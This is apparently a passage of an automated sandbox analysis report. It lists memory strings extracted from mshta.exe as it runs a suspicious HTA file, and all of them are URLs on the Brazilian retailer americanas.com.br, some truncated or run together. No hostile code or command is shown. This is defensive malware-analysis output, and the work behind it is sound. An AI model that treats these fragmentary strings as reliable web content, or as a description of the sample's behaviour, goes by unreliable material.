Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/politicang
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/premio?chave=dk_hm_ft_00_02_premios
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540362597.0000000005146000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/regras-do-site?chave=dk_hm_ft_00_06_regras
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicos
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicoshttps://www.america
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prf_hm_0_tt_8_
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prfm_mn_ss_22_a
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/seguro-celular-roubo-furto?chave=pfm_hm_tt_1_0_seguro
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termos
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termosa
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termoshttps://www.amer
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termoss
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_eletroportateis_topcategori
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_informatica_topcategorias
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?chave=brd_hm_tt_0_0_recebahoje
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entrega
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entregameta.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&ch
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/mapa-do-siteimentode_bottom_bndes_0_bottom_valepresente17cartesssars
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007B58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540128522.0000000007B59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/marca/chandon
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/1343943570?chave=dk_hm_bn_4_7_oferta-o2o
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esporte
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esportehttps://www.americ
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5271512690?chave=dk_hm_bn_4_4_oferta-portateis
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/produto/60405799?chave=dk_hm_bn_4_1_oferta
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/60405799?chave=dk_hm_bn_4_1_oferta-perfume
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/produto/60405799?chave=dk_hm_bn_4_1_oferta-perfumehttps://www.american
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7211551574?chave=dk_hm_bn_4_3_oferta-moda
